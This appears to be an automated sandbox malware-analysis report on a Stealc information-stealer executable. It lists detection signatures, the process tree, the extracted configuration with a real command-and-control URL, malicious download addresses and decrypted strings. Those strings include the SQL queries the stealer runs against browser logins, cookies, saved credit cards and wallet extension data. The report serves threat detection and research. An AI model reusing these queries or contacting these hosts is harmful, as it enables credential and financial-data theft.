Edit tour

Windows Analysis Report
LXS5itpTK7.exe

Overview

General Information

Sample name:	LXS5itpTK7.exe renamed because original name is a hash value
Original sample name:	99fad17313297da97105802d647b80b6.exe
Analysis ID:	1572917
MD5:	99fad17313297da97105802d647b80b6
SHA1:	6c2dea3d27486863a220b9dfc7ee30d8dd65903b
SHA256:	6edf3196e1691e0034185df3ac2eaad51a33248c305e35927fb5f6b5e13fa58e
Tags:	exeStealcuser-abuse_ch
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

LXS5itpTK7.exe (PID: 432 cmdline: "C:\Users\user\Desktop\LXS5itpTK7.exe" MD5: 99FAD17313297DA97105802D647B80B6)

B5F8.tmp.exe (PID: 4416 cmdline: "C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe" MD5: 1A1D5627373ECD30414938E941F281B8)

WerFault.exe (PID: 6388 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1360 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2358488571.00000000008D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x73ff:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.4483503852.0000000000540000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000003.2086429578.0000000002360000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.4483749729.0000000002130000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000002.00000002.2358508594.000000000090E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: B5F8.tmp.exe PID: 4416	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: B5F8.tmp.exe PID: 4416	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.B5F8.tmp.exe.21a0e67.1.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.3.B5F8.tmp.exe.2360000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.2.B5F8.tmp.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.3.B5F8.tmp.exe.2360000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.2.B5F8.tmp.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
2.2.B5F8.tmp.exe.21a0e67.1.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T08:57:03.819129+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49706	92.255.57.89	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-11T08:56:58.156182+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	104.21.56.70	443	TCP
2024-12-11T08:56:59.719972+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49705	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: LXS5itpTK7.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://92.255.57.89/s	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.php2bcf3ed6d7050e400	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/697b92cb4e247842/sqlite3.dllform-data;	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpSE	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.19/ScreenUpdateSync.exe;	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpkE	Avira URL Cloud: Label: malware
Source: http://92.255.57.89/45c616e921a794b8.phpsition:	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1306978
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306978

Found malware configuration

Source: 00000002.00000003.2086429578.0000000002360000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://92.255.57.89/45c616e921a794b8.php", "Botnet": "default"}

Multi AV Scanner detection for submitted file

Source: LXS5itpTK7.exe	ReversingLabs: Detection: 36%
Source: LXS5itpTK7.exe	Virustotal: Detection: 37%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: LXS5itpTK7.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 26
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 12
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 20
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: 24
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetProcAddress
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: LoadLibraryA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: lstrcatA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: OpenEventA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateEventA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CloseHandle
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Sleep
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: VirtualFree
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetSystemInfo
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: VirtualAlloc
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HeapAlloc
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetComputerNameA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: lstrcpyA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetProcessHeap
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcess
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: lstrlenA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ExitProcess
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetSystemTime
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: advapi32.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: gdi32.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: user32.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: crypt32.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetUserNameA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateDCA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetDeviceCaps
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ReleaseDC
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sscanf
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: VMwareVMware
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HAL9TH
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: JohnDoe
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DISPLAY
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: http://92.255.57.89
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: /45c616e921a794b8.php
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: /697b92cb4e247842/
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: default
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetFileAttributesA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HeapFree
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetFileSize
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GlobalSize
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: IsWow64Process
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Process32Next
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetLocalTime
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: FreeLibrary
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetVolumeInformationA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Process32First
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetLocaleInfoA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DeleteFileA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: FindNextFileA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: LocalFree
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: FindClose
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: LocalAlloc
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetFileSizeEx
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ReadFile
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SetFilePointer
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: WriteFile
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateFileA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: FindFirstFileA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CopyFileA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: VirtualProtect
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetLastError
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: lstrcpynA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: MultiByteToWideChar
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GlobalFree
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: WideCharToMultiByte
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GlobalAlloc
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: OpenProcess
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: TerminateProcess
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetCurrentProcessId
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: gdiplus.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ole32.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: bcrypt.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: wininet.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: shlwapi.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: shell32.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: rstrtmgr.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SelectObject
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BitBlt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: DeleteObject
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateCompatibleDC
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdiplusStartup
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdiplusShutdown
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdipDisposeImage
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GdipFree
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CoUninitialize
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CoInitialize
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CoCreateInstance
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BCryptDecrypt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BCryptSetProperty
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BCryptDestroyKey
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetWindowRect
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetDesktopWindow
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetDC
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CloseWindow
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: wsprintfA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CharToOemW
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: wsprintfW
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RegQueryValueExA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RegEnumKeyExA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RegOpenKeyExA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RegCloseKey
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RegEnumValueA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CryptBinaryToStringA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CryptUnprotectData
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SHGetFolderPathA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: ShellExecuteExA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: InternetOpenUrlA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: InternetConnectA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: InternetCloseHandle
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HttpSendRequestA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: HttpOpenRequestA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: InternetReadFile
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: InternetCrackUrlA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: StrCmpCA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: StrStrA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: StrCmpCW
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: PathMatchSpecA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: GetModuleFileNameExA
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RmStartSession
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RmRegisterResources
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RmGetList
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: RmEndSession
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_open
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_prepare_v2
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_step
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_text
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_finalize
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_close
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_bytes
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: sqlite3_column_blob
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: encrypted_key
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: PATH
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: NSS_Init
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: NSS_Shutdown
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: PK11_FreeSlot
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: PK11_Authenticate
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: PK11SDR_Decrypt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: C:\ProgramData\
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: browser:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: profile:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: url:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: login:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: password:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Opera
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: OperaGX
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Network
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: cookies
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: .txt
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: TRUE
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: FALSE
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: autofill
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: history
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: cc
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: name:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: month:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: year:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: card:
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Cookies
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Login Data
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Web Data
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: History
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: logins.json
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: formSubmitURL
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: usernameField
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: encryptedUsername
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: encryptedPassword
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: guid
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: cookies.sqlite
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: formhistory.sqlite
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: places.sqlite
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: plugins
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Local Extension Settings
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Sync Extension Settings
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: IndexedDB
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Opera Stable
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: Opera GX Stable
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: CURRENT
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: chrome-extension_
Source: 2.2.B5F8.tmp.exe.400000.0.unpack	String decryptor: _0.indexeddb.leveldb
